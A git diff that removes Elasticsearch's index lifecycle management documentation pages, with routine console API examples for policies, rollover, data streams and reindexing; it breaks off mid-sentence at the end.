- -An index's _lifecycle policy_ specifies which phases -are applicable, what actions are performed in each phase, -and when it transitions between phases. - -You can manually apply a lifecycle policy when you create an index. -For time series indices, you need to associate the lifecycle policy with -the index template used to create new indices in the series. -When an index rolls over, a manually-applied policy isn't automatically applied to the new index. - -If you use {es}'s security features, {ilm-init} performs operations as the user -who last updated the policy. {ilm-init} only has the -<> assigned to the user at the time of the last policy -update. - -[discrete] -[[ilm-phase-transitions]] -=== Phase transitions - -{ilm-init} moves indices through the lifecycle according to their age. -To control the timing of these transitions, you set a _minimum age_ for each phase. -For an index to move to the next phase, all actions in the current phase must be complete and -the index must be older than the minimum age of the next phase. - -The minimum age defaults to zero, which causes {ilm-init} to move indices to the next phase -as soon as all actions in the current phase complete. - -If an index has unallocated shards and the <> is yellow, -the index can still transition to the next phase according to its {ilm} policy. -However, because {es} can only perform certain clean up tasks on a green -cluster, there might be unexpected side effects. - -To avoid increased disk usage and reliability issues, -address any cluster health problems in a timely fashion. - - -[discrete] -[[ilm-phase-execution]] -=== Phase execution - -{ilm-init} controls the order in which the actions in a phase are executed and -what _steps_ are executed to perform the necessary index operations for each action. - -When an index enters a phase, {ilm-init} caches the phase definition in the index metadata. -This ensures that policy updates don't put the index into a state where it can never exit the phase. -If changes can be safely applied, {ilm-init} updates the cached phase definition. -If they cannot, phase execution continues using the cached definition. - -{ilm-init} runs periodically, checks to see if an index meets policy criteria, -and executes whatever steps are needed. -To avoid race conditions, {ilm-init} might need to run more than once to execute all of the steps -required to complete an action. -For example, if {ilm-init} determines that an index has met the rollover criteria, -it begins executing the steps required to complete the rollover action. -If it reaches a point where it is not safe to advance to the next step, execution stops. -The next time {ilm-init} runs, {ilm-init} picks up execution where it left off. -This means that even if `indices.lifecycle.poll_interval` is set to 10 minutes and an index meets -the rollover criteria, it could be 20 minutes before the rollover is complete. - -[discrete] -[[ilm-phase-actions]] -=== Phase actions - -{ilm-init} supports the following actions in each phase. 
-
-* Hot
-  - <>
-  - <>
-  - <>
-  - <>
-* Warm
-  - <>
-  - <>
-  - <>
-  - <>
-  - <>
-  - <>
-* Cold
-  - <>
-  - <>
-  - <>
-  - <>
-  - <>
-* Delete
-  - <>
-  - <>
-
diff --git a/docs/reference/ilm/ilm-overview.asciidoc b/docs/reference/ilm/ilm-overview.asciidoc
deleted file mode 100644
index c67db1a90bf..00000000000
--- a/docs/reference/ilm/ilm-overview.asciidoc
+++ /dev/null
@@ -1,57 +0,0 @@
-[role="xpack"]
-[testenv="basic"]
-[[overview-index-lifecycle-management]]
-== {ilm-init} overview
-
-++++
-Overview
-++++
-
-You can create and apply {ilm-cap} ({ilm-init}) policies to automatically manage your indices
-according to your performance, resiliency, and retention requirements.
-
-Index lifecycle policies can trigger actions such as:
-
-* **Rollover**:
-include::../glossary.asciidoc[tag=rollover-def-short]
-* **Shrink**:
-include::../glossary.asciidoc[tag=shrink-def-short]
-* **Force merge**:
-include::../glossary.asciidoc[tag=force-merge-def-short]
-* **Freeze**:
-include::../glossary.asciidoc[tag=freeze-def-short]
-* **Delete**: Permanently remove an index, including all of its data and metadata.
-
-{ilm-init} makes it easier to manage indices in hot-warm-cold architectures,
-which are common when you're working with time series data such as logs and metrics.
-
-You can specify:
-
-* The maximum shard size, number of documents, or age at which you want to roll over to a new index.
-* The point at which the index is no longer being updated and the number of
-primary shards can be reduced.
-* When to force a merge to permanently remove documents marked for deletion.
-* The point at which the index can be moved to less performant hardware.
-* The point at which the availability is not as critical and the number of
-replicas can be reduced.
-* When the index can be safely deleted.
-
-For example, if you are indexing metrics data from a fleet of ATMs into
-Elasticsearch, you might define a policy that says:
-
-. When the total size of the index's primary shards reaches 50GB, roll over to a new
-index.
-. Move the old index into the warm phase, mark it read-only, and shrink it down
-to a single shard.
-. After 7 days, move the index into the cold phase and move it to less expensive
-hardware.
-. Delete the index once the required 30-day retention period is reached.
-
-[IMPORTANT]
-===========================
-To use {ilm-init}, all nodes in a cluster must run the same version.
-Although it might be possible to create and apply policies in a mixed-version cluster,
-there is no guarantee they will work as intended.
-Attempting to use a policy that contains actions that aren't
-supported on all nodes in a cluster will cause errors.
-===========================
diff --git a/docs/reference/ilm/ilm-skip-rollover.asciidoc b/docs/reference/ilm/ilm-skip-rollover.asciidoc
deleted file mode 100644
index feaea73fec8..00000000000
--- a/docs/reference/ilm/ilm-skip-rollover.asciidoc
+++ /dev/null
@@ -1,34 +0,0 @@
-[[skipping-rollover]]
-== Skip rollover
-
-When `index.lifecycle.indexing_complete` is set to `true`,
-{ilm-init} won't perform the rollover action on an index,
-even if it otherwise meets the rollover criteria.
-It's set automatically by {ilm-init} when the rollover action completes successfully.
-
-You can set it manually to skip rollover if you need to make an exception
-to your normal lifecycle policy and update the alias to force a roll over,
-but want {ilm-init} to continue to manage the index.
-If you use the rollover API, it is not necessary to configure this setting manually.
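For illustration, assuming an existing index named `my-old-index` that you no longer want {ilm-init} to roll over, you could set the flag with the update index settings API:

[source,console]
--------------------------------------------------
PUT my-old-index/_settings <1>
{
  "index.lifecycle.indexing_complete": true
}
--------------------------------------------------
<1> `my-old-index` is a placeholder for the name of your own index.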
- -If an index's lifecycle policy is removed, this setting is also removed. - -IMPORTANT: When `index.lifecycle.indexing_complete` is `true`, -{ilm-init} verifies that the index is no longer the write index -for the alias specified by `index.lifecycle.rollover_alias`. -If the index is still the write index or the rollover alias is not set, -the index is moved to the <>. - -For example, if you need to change the name of new indices in a series while retaining -previously-indexed data in accordance with your configured policy, you can: - -. Create a template for the new index pattern that uses the same policy. -. Bootstrap the initial index. -. Change the write index for the alias to the bootstrapped index -using the <> API. -. Set `index.lifecycle.indexing_complete` to `true` on the old index to indicate -that it does not need to be rolled over. - -{ilm-init} continues to manage the old index in accordance with your existing policy. -New indices are named according to the new template and -managed according to the same policy without interruption. diff --git a/docs/reference/ilm/ilm-tutorial.asciidoc b/docs/reference/ilm/ilm-tutorial.asciidoc deleted file mode 100644 index 3b290ac8d70..00000000000 --- a/docs/reference/ilm/ilm-tutorial.asciidoc +++ /dev/null @@ -1,410 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[getting-started-index-lifecycle-management]] -== Tutorial: Automate rollover with {ilm-init} - -++++ -Automate rollover -++++ - -When you continuously index timestamped documents into {es}, -you typically use a <> so you can periodically roll over to a -new index. -This enables you to implement a hot-warm-cold architecture to meet your performance -requirements for your newest data, control costs over time, enforce retention policies, -and still get the most out of your data. - -TIP: Data streams are best suited for -<> use cases. If you need to frequently -update or delete existing documents across multiple indices, we recommend -using an index alias and index template instead. You can still use ILM to -manage and rollover the alias's indices. Skip to -<>. - -To automate rollover and management of a data stream with {ilm-init}, you: - -. <> that defines the appropriate -phases and actions. -. <> to create the data stream and -apply the ILM policy and the indices settings and mappings configurations for the backing -indices. -. <> -as expected. - -For an introduction to rolling indices, see <>. - -IMPORTANT: When you enable {ilm} for {beats} or the {ls} {es} output plugin, -lifecycle policies are set up automatically. -You do not need to take any other actions. -You can modify the default policies through -<> -or the {ilm-init} APIs. - -[discrete] -[[ilm-gs-create-policy]] -=== Create a lifecycle policy - -A lifecycle policy specifies the phases in the index lifecycle -and the actions to perform in each phase. A lifecycle can have up to four phases: -`hot`, `warm`, `cold`, and `delete`. - -For example, you might define a `timeseries_policy` that has two phases: - -* A `hot` phase that defines a rollover action to specify that an index rolls over when it -reaches either a `max_size` of 50 gigabytes or a `max_age` of 30 days. -* A `delete` phase that sets `min_age` to remove the index 90 days after rollover. -Note that this value is relative to the rollover time, not the index creation time. - -You can create the policy through {kib} or with the -<> API. -To create the policy from {kib}, open the menu and go to *Stack Management > -Index Lifecycle Policies*. 
Click *Index Lifecycle Policies*. - -[role="screenshot"] -image:images/ilm/create-policy.png[] - -.API example -[%collapsible] -==== -[source,console] ------------------------- -PUT _ilm/policy/timeseries_policy -{ - "policy": { - "phases": { - "hot": { <1> - "actions": { - "rollover": { - "max_size": "50GB", <2> - "max_age": "30d" - } - } - }, - "delete": { - "min_age": "90d", <3> - "actions": { - "delete": {} <4> - } - } - } - } -} ------------------------- -<1> The `min_age` defaults to `0ms`, so new indices enter the `hot` phase immediately. -<2> Trigger the `rollover` action when either of the conditions are met. -<3> Move the index into the `delete` phase 90 days after rollover. -<4> Trigger the `delete` action when the index enters the delete phase. -==== - -[discrete] -[[ilm-gs-apply-policy]] -=== Create an index template to create the data stream and apply the lifecycle policy - -To set up a data stream, first create an index template to specify the lifecycle policy. Because -the template is for a data stream, it must also include a `data_stream` definition. - -For example, you might create a `timeseries_template` to use for a future data stream -named `timeseries`. - -To enable the {ilm-init} to manage the data stream, the template configures one {ilm-init} setting: - -* `index.lifecycle.name` specifies the name of the lifecycle policy to apply to the data stream. - -You can use the {kib} Create template wizard to add the template. From Kibana, -open the menu and go to *Stack Management > Index Management*. In the *Index -Templates* tab, click *Create template*. - -image::images/data-streams/create-index-template.png[Create template page] - -This wizard invokes the <> to create -the index template with the options you specify. - -.API example -[%collapsible] -==== -[source,console] ------------------------ -PUT _index_template/timeseries_template -{ - "index_patterns": ["timeseries"], <1> - "data_stream": { }, - "template": { - "settings": { - "number_of_shards": 1, - "number_of_replicas": 1, - "index.lifecycle.name": "timeseries_policy" <2> - } - } -} ------------------------ -// TEST[continued] - -<1> Apply the template when a document is indexed into the `timeseries` target. -<2> The name of the {ilm-init} policy used to manage the data stream. -==== - -[discrete] -[[ilm-gs-create-the-data-stream]] -=== Create the data stream - -To get things started, index a document into the name or wildcard pattern defined -in the `index_patterns` of the <>. As long -as an existing data stream, index, or index alias does not already use the name, the index -request automatically creates a corresponding data stream with a single backing index. -{es} automatically indexes the request's documents into this backing index, which also -acts as the stream's <>. - -For example, the following request creates the `timeseries` data stream and the first generation -backing index called `.ds-timeseries-000001`. - -[source,console] ------------------------ -POST timeseries/_doc -{ - "message": "logged the request", - "@timestamp": "1591890611" -} - ------------------------ -// TEST[continued] - -When a rollover condition in the lifecycle policy is met, the `rollover` action: - -* Creates the second generation backing index, named `.ds-timeseries-000002`. -Because it is a backing index of the `timeseries` data stream, the configuration from the `timeseries_template` index template is applied to the new index. 
-* As it is the latest generation index of the `timeseries` data stream, the newly created -backing index `.ds-timeseries-000002` becomes the data stream's write index. - -This process repeats each time a rollover condition is met. -You can search across all of the data stream's backing indices, managed by the `timeseries_policy`, -with the `timeseries` data stream name. -Write operations are routed to the current write index. Read operations will be handled by all -backing indices. - -[discrete] -[[ilm-gs-check-progress]] -=== Check lifecycle progress - -To get status information for managed indices, you use the {ilm-init} explain API. -This lets you find out things like: - -* What phase an index is in and when it entered that phase. -* The current action and what step is being performed. -* If any errors have occurred or progress is blocked. - -For example, the following request gets information about the `timeseries` data stream's -backing indices: - -[source,console] --------------------------------------------------- -GET .ds-timeseries-*/_ilm/explain --------------------------------------------------- -// TEST[continued] - -The following response shows the data stream's first generation backing index is waiting for the `hot` -phase's `rollover` action. -It remains in this state and {ilm-init} continues to call `check-rollover-ready` until a rollover condition -is met. - -// [[36818c6d9f434d387819c30bd9addb14]] -[source,console-result] --------------------------------------------------- -{ - "indices": { - ".ds-timeseries-000001": { - "index": ".ds-timeseries-000001", - "managed": true, - "policy": "timeseries_policy", <1> - "lifecycle_date_millis": 1538475653281, - "age": "30s", <2> - "phase": "hot", - "phase_time_millis": 1538475653317, - "action": "rollover", - "action_time_millis": 1538475653317, - "step": "check-rollover-ready", <3> - "step_time_millis": 1538475653317, - "phase_execution": { - "policy": "timeseries_policy", - "phase_definition": { <4> - "min_age": "0ms", - "actions": { - "rollover": { - "max_size": "50gb", - "max_age": "30d" - } - } - }, - "version": 1, - "modified_date_in_millis": 1539609701576 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:no way to know if we will get this response immediately] - -<1> The policy used to manage the index -<2> The age of the index -<3> The step {ilm-init} is performing on the index -<4> The definition of the current phase (the `hot` phase) - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_data_stream/timeseries --------------------------------------------------- -// TEST[continued] - -////////////////////////// - - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_index_template/timeseries_template --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[discrete] -[[manage-time-series-data-without-data-streams]] -=== Manage time series data without data streams - -Even though <> are a convenient way to scale -and manage time series data, they are designed to be append-only. We recognise there -might be use-cases where data needs to be updated or deleted in place and the -data streams don't support delete and update requests directly, -so the index APIs would need to be used directly on the data stream's backing indices. 
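For example (the backing index name follows the earlier `timeseries` examples, and the document ID `my-document-id` is a made-up placeholder), deleting a document in place means sending the request to the backing index rather than to the data stream name:

[source,console]
--------------------------------------------------
DELETE .ds-timeseries-000001/_doc/my-document-id <1>
--------------------------------------------------
<1> `my-document-id` stands in for the ID of an existing document in the backing index.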
- -In these cases, you can use an index alias to manage indices containing the time series data -and periodically roll over to a new index. - -To automate rollover and management of time series indices with {ilm-init} using an index -alias, you: - -. Create a lifecycle policy that defines the appropriate phases and actions. -See <> above. -. <> to apply the policy to each new index. -. <> as the initial write index. -. <> -as expected. - -[discrete] -[[ilm-gs-alias-apply-policy]] -=== Create an index template to apply the lifecycle policy - -To automatically apply a lifecycle policy to the new write index on rollover, -specify the policy in the index template used to create new indices. - -For example, you might create a `timeseries_template` that is applied to new indices -whose names match the `timeseries-*` index pattern. - -To enable automatic rollover, the template configures two {ilm-init} settings: - -* `index.lifecycle.name` specifies the name of the lifecycle policy to apply to new indices -that match the index pattern. -* `index.lifecycle.rollover_alias` specifies the index alias to be rolled over -when the rollover action is triggered for an index. - -You can use the {kib} Create template wizard to add the template. To access the -wizard, open the menu and go to *Stack Management > Index Management*. In the -the *Index Templates* tab, click *Create template*. - -[role="screenshot"] -image:images/ilm/create-template-wizard.png[Create template page] - -The create template request for the example template looks like this: - -[source,console] ------------------------ -PUT _index_template/timeseries_template -{ - "index_patterns": ["timeseries-*"], <1> - "template": { - "settings": { - "number_of_shards": 1, - "number_of_replicas": 1, - "index.lifecycle.name": "timeseries_policy", <2> - "index.lifecycle.rollover_alias": "timeseries" <3> - } - } -} ------------------------ -// TEST[continued] - -<1> Apply the template to a new index if its name starts with `timeseries-`. -<2> The name of the lifecycle policy to apply to each new index. -<3> The name of the alias used to reference these indices. -Required for policies that use the rollover action. - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE _index_template/timeseries_template --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[discrete] -[[ilm-gs-alias-bootstrap]] -=== Bootstrap the initial time series index with a write index alias - -To get things started, you need to bootstrap an initial index and -designate it as the write index for the rollover alias specified in your index template. -The name of this index must match the template's index pattern and end with a number. -On rollover, this value is incremented to generate a name for the new index. - -For example, the following request creates an index called `timeseries-000001` -and makes it the write index for the `timeseries` alias. - -[source,console] ------------------------ -PUT timeseries-000001 -{ - "aliases": { - "timeseries": { - "is_write_index": true - } - } -} ------------------------ -// TEST[continued] - -When the rollover conditions are met, the `rollover` action: - -* Creates a new index called `timeseries-000002`. -This matches the `timeseries-*` pattern, so the settings from `timeseries_template` are applied to the new index. -* Designates the new index as the write index and makes the bootstrap index read-only. 
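As an optional aside (not a required step in this procedure), you can preview what the next rollover would do without executing it by calling the rollover API with its `dry_run` flag; the conditions here simply mirror the example `timeseries_policy`:

[source,console]
--------------------------------------------------
POST timeseries/_rollover?dry_run=true
{
  "conditions": {
    "max_size": "50gb",
    "max_age": "30d"
  }
}
--------------------------------------------------

The response reports which conditions are currently met and the name the next index would receive, without actually creating it.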
- -This process repeats each time rollover conditions are met. -You can search across all of the indices managed by the `timeseries_policy` with the `timeseries` alias. -Write operations are routed to the current write index. - -[discrete] -[[ilm-gs-alias-check-progress]] -=== Check lifecycle progress - -Retrieving the status information for managed indices is very similar to the data stream case. -See the data stream <> for more information. -The only difference is the indices namespace, so retrieving the progress will entail the following -api call: - -[source,console] --------------------------------------------------- -GET timeseries-*/_ilm/explain --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /timeseries-000001 --------------------------------------------------- -// TEST[continued] -////////////////////////// diff --git a/docs/reference/ilm/ilm-with-existing-indices.asciidoc b/docs/reference/ilm/ilm-with-existing-indices.asciidoc deleted file mode 100644 index 28a9ffce71c..00000000000 --- a/docs/reference/ilm/ilm-with-existing-indices.asciidoc +++ /dev/null @@ -1,202 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-with-existing-indices]] -== Manage existing indices - -If you've been using Curator or some other mechanism to manage periodic indices, -you have a couple options when migrating to {ilm-init}: - -* Set up your index templates to use an {ilm-init} policy to manage your new indices. -Once {ilm-init} is managing your current write index, you can apply an appropriate policy to your old indices. - -* Reindex into an {ilm-init}-managed index. - -NOTE: Starting in Curator version 5.7, Curator ignores {ilm-init} managed indices. - -[discrete] -[[ilm-existing-indices-apply]] -=== Apply policies to existing time series indices - -The simplest way to transition to managing your periodic indices with {ilm-init} is -to <> to apply a lifecycle policy to new indices. -Once the index you are writing to is being managed by {ilm-init}, -you can <> to your older indices. - -Define a separate policy for your older indices that omits the rollover action. -Rollover is used to manage where new data goes, so isn't applicable. - -Keep in mind that policies applied to existing indices compare the `min_age` for each phase to -the original creation date of the index, and might proceed through multiple phases immediately. -If your policy performs resource-intensive operations like force merge, -you don't want to have a lot of indices performing those operations all at once -when you switch over to {ilm-init}. - -You can specify different `min_age` values in the policy you use for existing indices, -or set <> -to control how the index age is calculated. - -Once all pre-{ilm-init} indices have been aged out and removed, -you can delete the policy you used to manage them. - -NOTE: If you are using {beats} or {ls}, enabling {ilm-init} in version 7.0 and onward -sets up {ilm-init} to manage new indices automatically. -If you are using {beats} through {ls}, -you might need to change your {ls} output configuration and invoke the {beats} setup -to use {ilm-init} for new data. - -[discrete] -[[ilm-existing-indices-reindex]] -=== Reindex into a managed index - -An alternative to <> is to -reindex your data into an {ilm-init}-managed index. 
-You might want to do this if creating periodic indices with very small amounts of data -has led to excessive shard counts, or if continually indexing into the same index has led to large shards -and performance issues. - -First, you need to set up the new {ilm-init}-managed index: - -. Update your index template to include the necessary {ilm-init} settings. -. Bootstrap an initial index as the write index. -. Stop writing to the old indices and index new documents using the alias that points to bootstrapped index. - -To reindex into the managed index: - -. Pause indexing new documents if you do not want to mix new and old data in the {ilm-init}-managed index. -Mixing old and new data in one index is safe, -but a combined index needs to be retained until you are ready to delete the new data. - -. Reduce the {ilm-init} poll interval to ensure that the index doesn't -grow too large while waiting for the rollover check. -By default, {ilm-init} checks to see what actions need to be taken every 10 minutes. -+ --- -[source,console] ------------------------ -PUT _cluster/settings -{ - "transient": { - "indices.lifecycle.poll_interval": "1m" <1> - } -} ------------------------ -// TEST[skip:don't want to overwrite this setting for other tests] -<1> Check once a minute to see if {ilm-init} actions such as rollover need to be performed. --- - -. Reindex your data using the <>. -If you want to partition the data in the order in which it was originally indexed, -you can run separate reindex requests. -+ --- -IMPORTANT: Documents retain their original IDs. If you don't use automatically generated document IDs, -and are reindexing from multiple source indices, you might need to do additional processing to -ensure that document IDs don't conflict. One way to do this is to use a -<> in the reindex call to append the original index name -to the document ID. - -////////////////////////// -[source,console] ------------------------ -PUT _index_template/mylogs_template -{ - "index_patterns": [ - "mylogs-*" - ], - "template": { - "settings": { - "number_of_shards": 1, - "number_of_replicas": 1, - "index": { - "lifecycle": { - "name": "mylogs_condensed_policy", <2> - "rollover_alias": "mylogs" <3> - } - } - }, - "mappings": { - "properties": { - "message": { - "type": "text" - }, - "@timestamp": { - "type": "date" - } - } - } - } -} ------------------------ - -[source,console] ------------------------ -POST mylogs-pre-ilm-2019.06.24/_doc -{ - "@timestamp": "2019-06-24T10:34:00", - "message": "this is one log message" -} ------------------------ -// TEST[continued] - -[source,console] ------------------------ -POST mylogs-pre-ilm-2019.06.25/_doc -{ - "@timestamp": "2019-06-25T17:42:00", - "message": "this is another log message" -} ------------------------ -// TEST[continued] - -[source,console] --------------------------------------------------- -DELETE _index_template/mylogs_template --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[source,console] ------------------------ -POST _reindex -{ - "source": { - "index": "mylogs-*" <1> - }, - "dest": { - "index": "mylogs", <2> - "op_type": "create" <3> - } -} ------------------------ -// TEST[continued] - -<1> Matches your existing indices. Using the prefix for - the new indices makes using this index pattern much easier. -<2> The alias that points to your bootstrapped index. -<3> Halts reindexing if multiple documents have the same ID. 
- This is recommended to prevent accidentally overwriting documents - if documents in different source indices have the same ID. --- - -. When reindexing is complete, set the {ilm-init} poll interval back to its default value to -prevent unnecessary load on the master node: -+ -[source,console] ------------------------ -PUT _cluster/settings -{ - "transient": { - "indices.lifecycle.poll_interval": null - } -} - ------------------------ -// TEST[skip:don't want to overwrite this setting for other tests] - -. Resume indexing new data using the same alias. -+ -Querying using this alias will now search your new data and all of the reindexed data. - -. Once you have verified that all of the reindexed data is available in the new managed indices, -you can safely remove the old indices. diff --git a/docs/reference/ilm/index-rollover.asciidoc b/docs/reference/ilm/index-rollover.asciidoc deleted file mode 100644 index 42350ed13c9..00000000000 --- a/docs/reference/ilm/index-rollover.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[[index-rollover]] -=== Rollover - -When indexing time series data like logs or metrics, you can't write to a single index indefinitely. -To meet your indexing and search performance requirements and manage resource usage, -you write to an index until some threshold is met and -then create a new index and start writing to it instead. -Using rolling indices enables you to: - -* Optimize the active index for high ingest rates on high-performance _hot_ nodes. -* Optimize for search performance on _warm_ nodes. -* Shift older, less frequently accessed data to less expensive _cold_ nodes, -* Delete data according to your retention policies by removing entire indices. - -We recommend using <> to manage time series -data. Data streams automatically track the write index while keeping configuration to a minimum. - -Each data stream requires an <> that contains: - -* A name or wildcard (`*`) pattern for the data stream. - -* The data stream's timestamp field. This field must be mapped as a - <> or <> field data type and must be - included in every document indexed to the data stream. - - * The mappings and settings applied to each backing index when it's created. - -Data streams are designed for append-only data, where the data stream name -can be used as the operations (read, write, rollover, shrink etc.) target. -If your use case requires data to be updated in place, you can instead manage your time series data using <>. However, there are a few more configuration steps and -concepts: - -* An _index template_ that specifies the settings for each new index in the series. -You optimize this configuration for ingestion, typically using as many shards as you have hot nodes. -* An _index alias_ that references the entire set of indices. -* A single index designated as the _write index_. -This is the active index that handles all write requests. -On each rollover, the new index becomes the write index. - -[discrete] -[role="xpack"] -[testenv="basic"] -[[ilm-automatic-rollover]] -=== Automatic rollover - -{ilm-init} enables you to automatically roll over to a new index based -on the index size, document count, or age. When a rollover is triggered, a new -index is created, the write alias is updated to point to the new index, and all -subsequent updates are written to the new index. - -TIP: Rolling over to a new index based on size, document count, or age is preferable -to time-based rollovers. 
Rolling over at an arbitrary time often results in -many small indices, which can have a negative impact on performance and -resource usage. diff --git a/docs/reference/ilm/index.asciidoc b/docs/reference/ilm/index.asciidoc deleted file mode 100644 index 550608916d8..00000000000 --- a/docs/reference/ilm/index.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[index-lifecycle-management]] -= {ilm-init}: Manage the index lifecycle - -[partintro] --- -You can configure {ilm} ({ilm-init}) policies to automatically manage indices -according to your performance, resiliency, and retention requirements. -For example, you could use {ilm-init} to: - -* Spin up a new index when an index reaches a certain size or number of documents -* Create a new index each day, week, or month and archive previous ones -* Delete stale indices to enforce data retention standards - -You can create and manage index lifecycle policies through {kib} Management or the {ilm-init} APIs. -When you enable {ilm} for {beats} or the {ls} {es} output plugin, -default policies are configured automatically. - -[role="screenshot"] -image:images/ilm/index-lifecycle-policies.png[] - -[TIP] -To automatically back up your indices and manage snapshots, -use <>. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- -include::ilm-overview.asciidoc[] - -include::ilm-concepts.asciidoc[] - -include::ilm-tutorial.asciidoc[] - -include::example-index-lifecycle-policy.asciidoc[leveloffset=-1] - -include::ilm-actions.asciidoc[] - -include::set-up-lifecycle-policy.asciidoc[] - -include::error-handling.asciidoc[] - -include::start-stop.asciidoc[] - -include::ilm-with-existing-indices.asciidoc[] - -include::ilm-skip-rollover.asciidoc[] - -include::ilm-and-snapshots.asciidoc[] diff --git a/docs/reference/ilm/set-up-lifecycle-policy.asciidoc b/docs/reference/ilm/set-up-lifecycle-policy.asciidoc deleted file mode 100644 index 667864c3c7e..00000000000 --- a/docs/reference/ilm/set-up-lifecycle-policy.asciidoc +++ /dev/null @@ -1,268 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[set-up-lifecycle-policy]] -== Configure a lifecycle policy [[ilm-policy-definition]] - -For {ilm-init} to manage an index, a valid policy -must be specified in the `index.lifecycle.name` index setting. - -To configure a lifecycle policy for <>, -you create the policy and add it to the <>. - -To use a policy to manage an index that doesn't roll over, -you can specify a lifecycle policy when you create the index, -or apply a policy directly to an existing index. - -{ilm-init} policies are stored in the global cluster state and can be included in snapshots -by setting `include_global_state` to `true` when you <>. -When the snapshot is restored, all of the policies in the global state are restored and -any local policies with the same names are overwritten. - -IMPORTANT: When you enable {ilm} for {beats} or the {ls} {es} output plugin, -the necessary policies and configuration changes are applied automatically. -You can modify the default policies, but you do not need to explicitly configure a policy or -bootstrap an initial index. - -[discrete] -[[ilm-create-policy]] -=== Create lifecycle policy - -To create lifecycle policies through {kib} Management -go to Management and click **Index Lifecycle Policies**. - -[role="screenshot"] -image:images/ilm/create-policy.png[] - -You specify the lifecycle phases for the policy and the actions to perform in each phase. - -The <> API is invoked to add the policy to the {es} cluster. 
- -.API example -[%collapsible] -==== -[source,console] ------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover": { - "max_size": "25GB" <1> - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} <2> - } - } - } - } -} ------------------------- - -<1> Roll over the index when it reaches 25GB in size -<2> Delete the index 30 days after rollover -==== - -[discrete] -[[apply-policy-template]] -=== Apply lifecycle policy with an index template - -To use a policy that triggers the rollover action, -you need to configure the policy in the index template used to create each new index. -You specify the name of the policy and the alias used to reference the rolling indices. - -You can use the {kib} Create template wizard to create a template. To access the -wizard, open the menu and go to *Stack Management > Index Management*. In the -the *Index Templates* tab, click *Create template*. - -[role="screenshot"] -image:images/ilm/create-template-wizard-my_template.png[Create template page] - -The wizard invokes the <> to add templates to a cluster. - -.API example -[%collapsible] -==== -[source,console] ------------------------ -PUT _index_template/my_template -{ - "index_patterns": ["test-*"], <1> - "template": { - "settings": { - "number_of_shards": 1, - "number_of_replicas": 1, - "index.lifecycle.name": "my_policy", <2> - "index.lifecycle.rollover_alias": "test-alias" <3> - } - } -} ------------------------ - -<1> Use this template for all new indices whose names begin with `test-` -<2> Apply `my_policy` to new indices created with this template -<3> Define an index alias for referencing indices managed by `my_policy` -==== -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE _index_template/my_template --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[discrete] -[[create-initial-index]] -==== Create an initial managed index - -When you set up policies for your own rolling indices, you need to manually create the first index -managed by a policy and designate it as the write index. - -IMPORTANT: When you enable {ilm} for {beats} or the {ls} {es} output plugin, -the necessary policies and configuration changes are applied automatically. -You can modify the default policies, but you do not need to explicitly configure a policy or -bootstrap an initial index. - -The name of the index must match the pattern defined in the index template and end with a number. -This number is incremented to generate the name of indices created by the rollover action. - -For example, the following request creates the `test-00001` index. -Because it matches the index pattern specified in `my_template`, -{es} automatically applies the settings from that template. - -[source,console] ------------------------ -PUT test-000001 -{ - "aliases": { - "test-alias":{ - "is_write_index": true <1> - } - } -} ------------------------ - -<1> Set this initial index to be the write index for this alias. - -Now you can start indexing data to the rollover alias specified in the lifecycle policy. -With the sample `my_policy` policy, the rollover action is triggered once the initial -index exceeds 25GB. -{ilm-init} then creates a new index that becomes the write index for the `test-alias`. 
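For illustration (the field values are made up), you then index documents through the alias so that they always land in the current write index:

[source,console]
--------------------------------------------------
POST test-alias/_doc
{
  "@timestamp": "2099-05-06T16:21:15.000Z",
  "message": "a sample log message"
}
--------------------------------------------------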
- -[discrete] -[[apply-policy-manually]] -=== Apply lifecycle policy manually - -You can specify a policy when you create an index or -apply a policy to an existing index through {kib} Management or -the <>. -When you apply a policy, {ilm-init} immediately starts managing the index. - -IMPORTANT: Do not manually apply a policy that uses the rollover action. -Policies that use rollover must be applied by the <>. -Otherwise, the policy is not carried forward when the rollover action creates a new index. - -The `index.lifecycle.name` setting specifies an index's policy. - -.API example -[%collapsible] -==== -[source,console] ------------------------ -PUT test-index -{ - "settings": { - "number_of_shards": 1, - "number_of_replicas": 1, - "index.lifecycle.name": "my_policy" <1> - } -} ------------------------ -<1> Sets the lifecycle policy for the index. -==== - -[discrete] -[[apply-policy-multiple]] -==== Apply a policy to multiple indices - -You can apply the same policy to multiple indices by using wildcards in the index name -when you call the <> API. - -WARNING: Be careful that you don't inadvertently match indices that you don't want to modify. - -////////////////////////// -[source,console] ------------------------ -PUT _index_template/mylogs_template -{ - "index_patterns": [ - "mylogs-*" - ], - "template": { - "settings": { - "number_of_shards": 1, - "number_of_replicas": 1 - }, - "mappings": { - "properties": { - "message": { - "type": "text" - }, - "@timestamp": { - "type": "date" - } - } - } - } -} ------------------------ - -[source,console] ------------------------ -POST mylogs-pre-ilm-2019.06.24/_doc -{ - "@timestamp": "2019-06-24T10:34:00", - "message": "this is one log message" -} ------------------------ -// TEST[continued] - -[source,console] ------------------------ -POST mylogs-pre-ilm-2019.06.25/_doc -{ - "@timestamp": "2019-06-25T17:42:00", - "message": "this is another log message" -} ------------------------ -// TEST[continued] - -[source,console] --------------------------------------------------- -DELETE _index_template/mylogs_template --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[source,console] ------------------------ -PUT mylogs-pre-ilm*/_settings <1> -{ - "index": { - "lifecycle": { - "name": "mylogs_policy_existing" - } - } -} ------------------------ -// TEST[continued] - -<1> Updates all 